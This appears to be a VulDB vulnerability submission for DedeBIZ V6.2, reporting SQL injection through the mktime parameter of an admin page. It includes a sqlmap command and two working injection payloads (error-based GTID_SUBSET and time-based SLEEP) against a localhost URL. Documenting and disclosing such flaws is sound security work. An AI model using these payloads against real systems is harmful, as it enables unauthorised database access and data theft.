Submit #211260: SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php

Title: SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php
Description:
[Suggested description] SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/makehtml_taglist_action.php
[Vulnerability Type] SQL INJECTION
[Vendor of Product] https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base] DedeBIZ V6.2
[Affected Component] File: /src/admin/makehtml_taglist_action.php Parameter: mktime

python sqlmap.py -r sql.txt --current-db

Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND GTID_SUBSET(CONCAT(0x716b787871,(SELECT (ELT(2192=2192,1))),0x716b7a6a71),2192)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://localhost:8086/admin/makehtml_taglist_action.php?maxpagesize=50&tagid=0&pageno=0&upall=1&ctagid=0&startid=0&endid=0&mktime=1 AND (SELECT 9884 FROM (SELECT(SLEEP(5)))NySf)

[Attack Type] Remote
Source: https://github.com/yhy217/dedebiz--vul/issues/2
User: jamspilly (UID 54414)
Submission: 09/21/2023 11:20 (3 years ago)
Moderation: 09/29/2023 08:01 (8 days later)
Status: Accepted
VulDB entry: 240881 [DedeBIZ 6.2 makehtml_taglist_action.php mktime sql injection]
Points: 20
